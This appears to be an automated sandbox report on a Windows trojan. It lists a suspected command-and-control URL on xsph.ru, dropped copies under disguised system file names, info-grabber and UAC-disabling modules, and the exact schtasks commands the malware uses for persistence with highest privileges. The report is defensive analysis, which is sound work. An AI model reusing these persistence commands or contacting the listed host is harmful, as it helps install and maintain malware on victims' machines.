68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 24 Nov 2024 03:04:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69

Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027BF000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027B4000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.000000000278F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a1043195.xsph.ru
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.0000000002771000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.000000000278F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a1043195.xsph.ru/
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.000000000278F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a1043195.xsph.ru/e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001D.00000002.2168378706.0000000000968000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mic
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.000000000278F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp.sprinthost.ru
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cp.sprinthost.ru/auth/login
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027C8000.00000004.00000800.00020000.00000000.sdmp, mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2119361653.00000000027F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://index.from.sh/pages/game.html

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe	COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}

Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Code function: 0_2_00007FF848F33565	0_2_00007FF848F33565
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Code function: 0_2_00007FF848F39FB5	0_2_00007FF848F39FB5
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Code function: 20_2_00007FF848F0B08D	20_2_00007FF848F0B08D
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Code function: 20_2_00007FF848F03354	20_2_00007FF848F03354
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Code function: 20_2_00007FF848F0A29C	20_2_00007FF848F0A29C
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Code function: 20_2_00007FF848F02C10	20_2_00007FF848F02C10
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Code function: 20_2_00007FF848F02C10	20_2_00007FF848F02C10
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Code function: 20_2_00007FF848F0B04D	20_2_00007FF848F0B04D
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Code function: 20_2_00007FF848F0B0A5	20_2_00007FF848F0B0A5
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Code function: 20_2_00007FF848F02C10	20_2_00007FF848F02C10
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Code function: 20_2_00007FF848F09FB5	20_2_00007FF848F09FB5
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Code function: 22_2_00007FF848F13565	22_2_00007FF848F13565
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe	Code function: 22_2_00007FF848F19FB5	22_2_00007FF848F19FB5
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Code function: 25_2_00007FF848F13565	25_2_00007FF848F13565
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Code function: 25_2_00007FF848F19FB5	25_2_00007FF848F19FB5
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Code function: 27_2_00007FF848F43565	27_2_00007FF848F43565
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe	Code function: 27_2_00007FF848F49FB5	27_2_00007FF848F49FB5
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Code function: 28_2_00007FF848F23565	28_2_00007FF848F23565
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Code function: 28_2_00007FF848F29FB5	28_2_00007FF848F29FB5
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Code function: 29_2_00007FF848F33565	29_2_00007FF848F33565
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Code function: 29_2_00007FF848F39FB5	29_2_00007FF848F39FB5
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Code function: 30_2_00007FF848F29FB5	30_2_00007FF848F29FB5
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe	Code function: 30_2_00007FF848F23565	30_2_00007FF848F23565
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Code function: 31_2_00007FF848F49FB5	31_2_00007FF848F49FB5
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Code function: 31_2_00007FF848F43565	31_2_00007FF848F43565
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Code function: 32_2_00007FF848F33565	32_2_00007FF848F33565
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe	Code function: 32_2_00007FF848F39FB5	32_2_00007FF848F39FB5
Source: C:\Recovery\System.exe	Code function: 33_2_00007FF848F13565	33_2_00007FF848F13565
Source: C:\Recovery\System.exe	Code function: 33_2_00007FF848F19FB5	33_2_00007FF848F19FB5
Source: C:\Recovery\System.exe	Code function: 34_2_00007FF848F19FB5	34_2_00007FF848F19FB5
Source: C:\Recovery\System.exe	Code function: 34_2_00007FF848F13565	34_2_00007FF848F13565
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Code function: 37_2_00007FF848F1512D	37_2_00007FF848F1512D
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Code function: 37_2_00007FF848F17057	37_2_00007FF848F17057
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Code function: 37_2_00007FF848F14B59	37_2_00007FF848F14B59
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Code function: 37_2_00007FF848F161E1	37_2_00007FF848F161E1
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Code function: 37_2_00007FF848F126D8	37_2_00007FF848F126D8
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Code function: 37_2_00007FF848F12179	37_2_00007FF848F12179
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Code function: 37_2_00007FF848F03565	37_2_00007FF848F03565
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Code function: 37_2_00007FF848F09FB5	37_2_00007FF848F09FB5
Source: C:\Recovery\System.exe	Code function: 38_2_00007FF848F29FB5	38_2_00007FF848F29FB5
Source: C:\Recovery\System.exe	Code function: 38_2_00007FF848F23565	38_2_00007FF848F23565

Source: 4KjLUaW30K.exe	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: mnUYCZffXdEgQlZPiczLektp.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: mnUYCZffXdEgQlZPiczLektp.exe0.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ShellExperienceHost.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: dllhost.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: 4KjLUaW30K.exe, 00000000.00000000.2028330302.0000000000674000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMiscInfoGrabber.dclib4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2102472012.000000001B9A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074623783.00000000029B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMiscInfoGrabber.dclib4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074873324.00000000029D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2086148884.0000000012C22000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2072779086.0000000000F70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDisableUAC.dclib4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2104376642.000000001BDA1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074339378.0000000002990000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename( vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074823760.00000000029C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2073930444.0000000002970000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename$ vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002BA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDisableUAC.dclib4 vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe, 00000000.00000002.2074993070.0000000002B14000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename( vs 4KjLUaW30K.exe
Source: 4KjLUaW30K.exe	Binary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4KjLUaW30K.exe

Source: 4KjLUaW30K.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 4KjLUaW30K.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mnUYCZffXdEgQlZPiczLektp.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mnUYCZffXdEgQlZPiczLektp.exe0.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ShellExperienceHost.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dllhost.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 4KjLUaW30K.exe, QYy0Hs0Ej6oohN07xsf.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4KjLUaW30K.exe, QYy0Hs0Ej6oohN07xsf.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 4KjLUaW30K.exe, DBx1HnV2WnrVt2OJGyF.cs	Cryptographic APIs: 'TransformBlock'
Source: 4KjLUaW30K.exe, DBx1HnV2WnrVt2OJGyF.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@33/31@1/1

Source: C:\Users\user\Desktop\4KjLUaW30K.exe

File created: C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe

Jump to behavior

Source: C:\Users\user\Desktop\4KjLUaW30K.exe

File created: C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe

Jump to behavior

Source: C:\Recovery\System.exe	Mutant created: NULL
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\d945671f81d9dd580b9f4721388aab3966aadb2c

Source: C:\Users\user\Desktop\4KjLUaW30K.exe

File created: C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\mnUYCZffXdEgQlZPiczLektp.exe

Jump to behavior

Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\70189604-2a9a-4ba1-809b-491977885217.vbs"

Source: 4KjLUaW30K.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 4KjLUaW30K.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process

Source: C:\Users\user\Desktop\4KjLUaW30K.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\4KjLUaW30K.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 4KjLUaW30K.exe	ReversingLabs: Detection: 83%
Source: 4KjLUaW30K.exe	Virustotal: Detection: 68%

Source: C:\Users\user\Desktop\4KjLUaW30K.exe

File read: C:\Users\user\Desktop\4KjLUaW30K.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\4KjLUaW30K.exe "C:\Users\user\Desktop\4KjLUaW30K.exe"
Source: unknown	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Recovery\System.exe'" /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\System.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Recovery\System.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe'" /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\4KjLUaW30K.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\audiodg.exe'" /rl HIGHEST /f
